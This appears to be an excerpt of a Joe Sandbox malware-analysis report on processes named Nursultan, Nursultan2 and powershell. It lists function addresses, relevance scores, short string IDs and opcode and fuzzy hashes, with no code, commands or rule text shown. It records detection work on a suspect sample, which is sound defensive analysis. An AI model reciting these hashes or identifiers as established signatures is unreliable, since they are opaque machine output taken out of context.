                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd6b32403bf3da7a01d1d4570e50d711024a80bf60c26e07156c70825c803e9a
                                        • Instruction ID: 096e3986634900ccc259dc0d2f8a114839d3ad0a35e0754563751e3b9627e2de
                                        • Opcode Fuzzy Hash: bd6b32403bf3da7a01d1d4570e50d711024a80bf60c26e07156c70825c803e9a
                                        • Instruction Fuzzy Hash: 72D1D530A189298FDB98FB28C458ABD77E2FF58354F544279E42AE31D2CF34AC418744
                                        Function 00007FF848E604BD Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CO_^
                                        • API String ID: 0-3937211734
                                        • Opcode ID: 1f0ade93ed9341b54177c5cc1c7735b50118179cfdec2e3c2226c2ed04fa8ee3
                                        • Instruction ID: 5913b013f0f5078bd894e3fb1e38c99975bc6f263934b837f70d441b7b7f9459
                                        • Opcode Fuzzy Hash: 1f0ade93ed9341b54177c5cc1c7735b50118179cfdec2e3c2226c2ed04fa8ee3
                                        • Instruction Fuzzy Hash: 80412B52E0DDD29FF259B778181A1A9BBD0FF623A0F4C41B7C058760C3DF2978168295
                                        Function 00007FF848E604A8 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: O_L
                                        • API String ID: 0-3936452892
                                        • Opcode ID: e5ac1d5ee576840c103b17a96537da6866de638c002bf29bcd7bf91c3d97f0c3
                                        • Instruction ID: bbc445661f47c1177d4a5085fee90181542586dd4f48fed63c02f7c8306e63e8
                                        • Opcode Fuzzy Hash: e5ac1d5ee576840c103b17a96537da6866de638c002bf29bcd7bf91c3d97f0c3
                                        • Instruction Fuzzy Hash: 7FA11160E2CA495FE799EB3C94593B9BBD2FF98350F884179D00ED3282DF38A8418355
                                        Function 00007FF848E60458 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CO_^
                                        • API String ID: 0-3937211734
                                        • Opcode ID: 816189d9dca325d5d7957cac7cfa42f4e0b3f97769f99de800b85ecdda11c17b
                                        • Instruction ID: 485b6199c83ca8ceb02bf715690f9b818022f5e60476d132e234ebaeafca30b4
                                        • Opcode Fuzzy Hash: 816189d9dca325d5d7957cac7cfa42f4e0b3f97769f99de800b85ecdda11c17b
                                        • Instruction Fuzzy Hash: 54F01C52C4E6D16FE21A667C38710F5BFB0EF02124B0C51B7C0C896093A918A84E8359
                                        Function 00007FF848E604A0 Relevance: .5, Instructions: 503COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5218edb64df6032d7e7e584971cfe1289dbe5bd205698182b9aa98672d7a996d
                                        • Instruction ID: 7a02864a8aca2250128d72ca61e77142c7596e3d5c90d6112d33fcb1fc8b0149
                                        • Opcode Fuzzy Hash: 5218edb64df6032d7e7e584971cfe1289dbe5bd205698182b9aa98672d7a996d
                                        • Instruction Fuzzy Hash: 75412952E0DED29FF2197679181A1A9BBD0FF62360F4C81B7C058664C3EE2978168295
                                        Function 00007FF848E61089 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92b85ca17b18bc134ca6efb6e6afc1ffe301a94b466a42e4bd70d61a8057b1db
                                        • Instruction ID: 16bfcf589c9b8c5fe29f3043548a984145678fa25c738048020cac4131fd9547
                                        • Opcode Fuzzy Hash: 92b85ca17b18bc134ca6efb6e6afc1ffe301a94b466a42e4bd70d61a8057b1db
                                        • Instruction Fuzzy Hash: 61014512F0DDC90FE7A9F27C28A92B4ABC1FB9A650F4801B6D04CC3297ED2968024351
                                        Function 00007FF848E604B0 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79812300e1da68a95fae2d9df223fbec075c85f8b8a9f089bd9572443fad275c
                                        • Instruction ID: dc130f8e05294da509b1879d6034508e64d61e8b021cd2daca633d6ea8060921
                                        • Opcode Fuzzy Hash: 79812300e1da68a95fae2d9df223fbec075c85f8b8a9f089bd9572443fad275c
                                        • Instruction Fuzzy Hash: 77F0C811F1DC990FF6A8B17C64A92B957C2FBEDAA1F840136D40DD328ADD256C424351
                                        Function 00007FF848E609DD Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2107724101.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 170e471731350423c7b3f7ad389563a80ef97800da08e7a9457d4490452be868
                                        • Instruction ID: a7e1d780e94ede98dc348473593445c5fa7eb1bf0508f0a9ba06640a9fb1f0e3
                                        • Opcode Fuzzy Hash: 170e471731350423c7b3f7ad389563a80ef97800da08e7a9457d4490452be868
                                        • Instruction Fuzzy Hash: 0AF081A1E0CA610FE744B63858564793FD0FBA4680F48046AD449D7192EE28E9404385

                                        Executed Functions

                                        Function 00007FF848E70A21 Relevance: .4, Instructions: 401COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 184301d5f23e43c5bd7fbe4e2f9d858619c95fad90751754ccf48fa710dc53bc
                                        • Instruction ID: c36285816be13c79eb28eaa4ee5dff179691f97519dffefcb5259a856b48112c
                                        • Opcode Fuzzy Hash: 184301d5f23e43c5bd7fbe4e2f9d858619c95fad90751754ccf48fa710dc53bc
                                        • Instruction Fuzzy Hash: FFD17D30A1891D8FDB98FB68D458ABA73E2FF58351F144679E42AD32D2DF34AC518740
                                        Function 00007FF848E704B2 Relevance: 1.8, Strings: 1, Instructions: 518COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CN_^
                                        • API String ID: 0-3949952865
                                        • Opcode ID: 2704b9e3e0f09d4f903cf140b22a31940e507cf87fd8c77a1eea86268d1fe717
                                        • Instruction ID: 5446ae03c3dbf43d2a6b5662785e54e312407910c742d47e15a3207c7c40cf6c
                                        • Opcode Fuzzy Hash: 2704b9e3e0f09d4f903cf140b22a31940e507cf87fd8c77a1eea86268d1fe717
                                        • Instruction Fuzzy Hash: 9541C761E0DAC29FF259B7B858191A9BBD0FF627A1F0C41BBC058470D3EF296816C395
                                        Function 00007FF848E704A8 Relevance: .3, Instructions: 332COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 826944cf70458f4792f44240ed5ed306bc605f2cdbc79f19e4f967f4375c49a2
                                        • Instruction ID: ed3b2b81b222e29f6ef2e188fbd29a0352c00721000c5a54c5ac9e43598cde04
                                        • Opcode Fuzzy Hash: 826944cf70458f4792f44240ed5ed306bc605f2cdbc79f19e4f967f4375c49a2
                                        • Instruction Fuzzy Hash: 04A1E161E1CA495FE798EB3C98593B9BBD2FF98790F080179D40ED3282DF38A8418755
                                        Function 00007FF848E71509 Relevance: .3, Instructions: 332COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbceffd57c2a56e2bbfc966d23c01b7cc2f4c677419b8700dbd8db9fa4a8ff6f
                                        • Instruction ID: 2fb08316b88d67ce3b16f8ade1d382d50723e9f39709c61ad09e4e11d0ab76ec
                                        • Opcode Fuzzy Hash: cbceffd57c2a56e2bbfc966d23c01b7cc2f4c677419b8700dbd8db9fa4a8ff6f
                                        • Instruction Fuzzy Hash: 13A1D261E1CA895FF798EB3C94593B9BBD2FB98790F08017AD40DC3282DF3898458755
                                        Function 00007FF848E7109E Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3aefc492cae208ff6db7c64d9cc930df51b7640120d1410934be3ef214b7a804
                                        • Instruction ID: b54c6fc56cd7744e30545600d4b2e763266d7e858662d4ae13de14a0febb7588
                                        • Opcode Fuzzy Hash: 3aefc492cae208ff6db7c64d9cc930df51b7640120d1410934be3ef214b7a804
                                        • Instruction Fuzzy Hash: 13E09202F1DC490FE798B5AD78993B8A3C2E7DD661F40513AD00DC338AED295C834781
                                        Function 00007FF848E709E6 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2106918355.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_7ff848e70000_Nursultan.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7952ce4fde5f4f0dcc5eafced7d4c79cbd69f305fee89582eee98de5cef4408
                                        • Instruction ID: 82bc3858bcf3d53bf2e271f72424d3b65db45acd85c03d8b76edb34d9bae1bef
                                        • Opcode Fuzzy Hash: e7952ce4fde5f4f0dcc5eafced7d4c79cbd69f305fee89582eee98de5cef4408
                                        • Instruction Fuzzy Hash: 7BE0C220A18D250BEB88F618A442DFDB7C1EBC8394F480468F80DC3282DE28AB8183C5

                                        Executed Functions

                                        Function 00007FF848F46605 Relevance: .4, Instructions: 434COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2362574059.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 918fa666c692cf73cb83ed4a4caf243f7a6bb8e92f2c93d798946450c6796e08
                                        • Instruction ID: f6d2c4d68b801534822c17427ca3d987f6d017bb0ac24441d3df804f7d4abebb
                                        • Opcode Fuzzy Hash: 918fa666c692cf73cb83ed4a4caf243f7a6bb8e92f2c93d798946450c6796e08
                                        • Instruction Fuzzy Hash: 16D14471D1EA8A5FF79AAB2858145B57BA0EF26B90F1801FFD00DDB0C3EA1CA805C755
                                        Function 00007FF848E7A042 Relevance: .3, Instructions: 309COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2360509288.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848e70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a21fcc956e2f0a9945267726fb74ced1139f4516becf4a33629c40cd87214c1
                                        • Instruction ID: f49558391f62e75d0be8436688347a76dd858277a94699636d3de2510dec18ba
                                        • Opcode Fuzzy Hash: 9a21fcc956e2f0a9945267726fb74ced1139f4516becf4a33629c40cd87214c1
                                        • Instruction Fuzzy Hash: 8B41B5A784E6C55FD70BAB78A8660E43F60FF13254F0D41F7D488CA0A3EE185889C75A
                                        Function 00007FF848F44073 Relevance: .2, Instructions: 187COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2362574059.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6f34e9349e850126ceb9a0d3cfdf88e0c33c9f0c3b13c01129413df0f9dde79
                                        • Instruction ID: 7c0b5c565dbfe082c9e56cb416085a2d282d96fc0a16ff283a46bd35f0ed9c73
                                        • Opcode Fuzzy Hash: d6f34e9349e850126ceb9a0d3cfdf88e0c33c9f0c3b13c01129413df0f9dde79
                                        • Instruction Fuzzy Hash: 8F510532E0EA8A4FE79AAB2C541167477E1FFB5A54F1801BBC04EE71D3DF14E8158249
                                        Function 00007FF848F44370 Relevance: .1, Instructions: 148COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2362574059.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: afa0c0c8010c3a267dd5eebec6ae808c1bcd8834ead91b8b045ae62a77c010f1
                                        • Instruction ID: fc7173677517c19de8930c4f6fb23cd93fc8e0769596eb7db2240200b2e040ee
                                        • Opcode Fuzzy Hash: afa0c0c8010c3a267dd5eebec6ae808c1bcd8834ead91b8b045ae62a77c010f1
                                        • Instruction Fuzzy Hash: 7A412632E0EA494FE7A9E72854116B477E1EF61A64F0801FBC44DE71D7EB18AC118389
                                        Function 00007FF848D5E380 Relevance: .1, Instructions: 125COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2357865998.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848d5d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 623d277fce94bc01ef7e13132fc2bad701a094198156eeed20ba3a928ec69250
                                        • Instruction ID: 1146af5a149128b09cd2dec8992ce96dc55933228e23e9c3a8c334cef638efb3
                                        • Opcode Fuzzy Hash: 623d277fce94bc01ef7e13132fc2bad701a094198156eeed20ba3a928ec69250
                                        • Instruction Fuzzy Hash: F341367180EBC44FE756AB289841A527FF0EF52361F1505EFD088CB1A3D725E80AC792
                                        Function 00007FF848E79788 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2360509288.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848e70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d63edab09a9d78ff6c8c73c4a6887cd59b22ecac51ee87975b409bec7f9cce1
                                        • Instruction ID: 156fb8664cd3015ab39ae557ec0b6a13af57600f1b50b2fbcc1214c6c619dad2
                                        • Opcode Fuzzy Hash: 8d63edab09a9d78ff6c8c73c4a6887cd59b22ecac51ee87975b409bec7f9cce1
                                        • Instruction Fuzzy Hash: C331A43191CA4C9FDB5CDF5C984A6A977E0FB98311F00422FE44993251CB71A8568BC2
                                        Function 00007FF848F440BF Relevance: .1, Instructions: 100COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2362574059.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d3cf1472d7e6a43384feb31c0ea31fa782c69f2a7861273424fa205eadfff79
                                        • Instruction ID: 221198c0acd1a1450c133e08d7f1986944967f7ced3cef9a57fd6f92ded98e19
                                        • Opcode Fuzzy Hash: 4d3cf1472d7e6a43384feb31c0ea31fa782c69f2a7861273424fa205eadfff79
                                        • Instruction Fuzzy Hash: 7C21BF32D1EA864FE3AAEB1C985117466D1FFB4A98F5901BAC00EF71D2DF18DC458249
                                        Function 00007FF848E7A62C Relevance: .1, Instructions: 100COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2360509288.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848e70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9740d976e6926532fcb2ed22764929aa45ad558ba86bd9d46a885478309675a
                                        • Instruction ID: d8247506b4b09aaaa2004c92fa2d6b68608a07d88d1ce6dd8df90622ef1072ac
                                        • Opcode Fuzzy Hash: b9740d976e6926532fcb2ed22764929aa45ad558ba86bd9d46a885478309675a
                                        • Instruction Fuzzy Hash: 5531063190CB4C8FDB59DFAC984A6E97BF0EB56320F04426FD048C3152DA74A456CB91
                                        Function 00007FF848F443BC Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2362574059.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16a2c96822408770a330c7838788724988adbc7ac6b9da1fb2db0555b9bc6c61
                                        • Instruction ID: 75b33324ac91af674ec0ed93e18e4a15b47e1cc4ffd969539e90a05ce4edac00
                                        • Opcode Fuzzy Hash: 16a2c96822408770a330c7838788724988adbc7ac6b9da1fb2db0555b9bc6c61
                                        • Instruction Fuzzy Hash: A311E032E0F9854FE6A4E72894545B87BE0FF60E68F5800FBD41DE71E6DB18AC108388
                                        Function 00007FF848E733B5 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2360509288.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848e70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                        • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45

                                        Non-executed Functions

                                        Function 00007FF848E78BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2360509288.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff848e70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M_^4$M_^7$M_^F$M_^J
                                        • API String ID: 0-622050427
                                        • Opcode ID: d48b9a86e15b6121fdbc22e503080a4e9c023ffc754724c43785c41b1f88ea82
                                        • Instruction ID: 725765fdab5eb4fc6dc0b808c9c5322b07e5f4148511d7d2ba618ef3c928e049
                                        • Opcode Fuzzy Hash: d48b9a86e15b6121fdbc22e503080a4e9c023ffc754724c43785c41b1f88ea82
                                        • Instruction Fuzzy Hash: 0F2129F7649865AED30A7B7DF8045E93740DF942B4B8953B2E098CB083FE1470868ED4

                                        Executed Functions

                                        Function 00007FF848E60A41 Relevance: .4, Instructions: 400COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04d5e059f282d00355ff3a7e736faab3d928fd4427305e647a848511af506664
                                        • Instruction ID: 3fee189d7c67a9c9ad97ef1a757163d59c7d1c429a372e373c8354614fa984b9
                                        • Opcode Fuzzy Hash: 04d5e059f282d00355ff3a7e736faab3d928fd4427305e647a848511af506664
                                        • Instruction Fuzzy Hash: 62D1A130A189298FDB98FB28C458ABE77E2FF58351F544679E42AE31D2DF34AC418744
                                        Function 00007FF848E604BD Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CO_^
                                        • API String ID: 0-3937211734
                                        • Opcode ID: 69c402e400290101ccd68c5a7659a002b17434a167ea99034d6bf704b29a35d3
                                        • Instruction ID: 7d9698f61d0e23abc75fbd4dce2be1ea274a9d8088cc415b526e338b90cc4133
                                        • Opcode Fuzzy Hash: 69c402e400290101ccd68c5a7659a002b17434a167ea99034d6bf704b29a35d3
                                        • Instruction Fuzzy Hash: B9412B52E0DDD29FF2597778181A1A9BBD0FF623A0F4C41B7C058760C3DF2978168295
                                        Function 00007FF848E604A8 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: O_L
                                        • API String ID: 0-3936452892
                                        • Opcode ID: facaa26543c6cf9a03ae3579ce909cf62f6552b8eacd88c1fcb962bcdb276cb8
                                        • Instruction ID: fe6b359de1efbb5e740cc96aab13c27353a077e86f15dc0c092c58d0cf0b6fbe
                                        • Opcode Fuzzy Hash: facaa26543c6cf9a03ae3579ce909cf62f6552b8eacd88c1fcb962bcdb276cb8
                                        • Instruction Fuzzy Hash: EFA11160E2CA495FE799EB3C94593B9BBD2FF98350F884179D00ED3282DF38A8418355
                                        Function 00007FF848E60458 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3CO_^
                                        • API String ID: 0-3937211734
                                        • Opcode ID: 816189d9dca325d5d7957cac7cfa42f4e0b3f97769f99de800b85ecdda11c17b
                                        • Instruction ID: 485b6199c83ca8ceb02bf715690f9b818022f5e60476d132e234ebaeafca30b4
                                        • Opcode Fuzzy Hash: 816189d9dca325d5d7957cac7cfa42f4e0b3f97769f99de800b85ecdda11c17b
                                        • Instruction Fuzzy Hash: 54F01C52C4E6D16FE21A667C38710F5BFB0EF02124B0C51B7C0C896093A918A84E8359
                                        Function 00007FF848E604A0 Relevance: .5, Instructions: 503COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5218edb64df6032d7e7e584971cfe1289dbe5bd205698182b9aa98672d7a996d
                                        • Instruction ID: 7a02864a8aca2250128d72ca61e77142c7596e3d5c90d6112d33fcb1fc8b0149
                                        • Opcode Fuzzy Hash: 5218edb64df6032d7e7e584971cfe1289dbe5bd205698182b9aa98672d7a996d
                                        • Instruction Fuzzy Hash: 75412952E0DED29FF2197679181A1A9BBD0FF62360F4C81B7C058664C3EE2978168295
                                        Function 00007FF848E61089 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 896dc11376b5d890ddd5407a39c263ab16aaab226bea0b1a69abf99a5de1e89e
                                        • Instruction ID: 9fff8ec629d5d93c964ce09006f1e7f4716661a89bc499b5d23ed6f9f15ad138
                                        • Opcode Fuzzy Hash: 896dc11376b5d890ddd5407a39c263ab16aaab226bea0b1a69abf99a5de1e89e
                                        • Instruction Fuzzy Hash: B9016812F1DDC90FE7A9F37C28AA2B56BC1FB9A650F4801B6D04CC329BED296C024351
                                        Function 00007FF848E604B0 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2138211991.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ff848e60000_Nursultan2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c9bce21643b9b65a700406d9934267c5eabb8194a8c856c3c334462a35510427
                                        • Instruction ID: 37f68a4501928712e5834622393322af61c2ff4d8cc7678c481475c486cca311
                                        • Opcode Fuzzy Hash: c9bce21643b9b65a700406d9934267c5eabb8194a8c856c3c334462a35510427
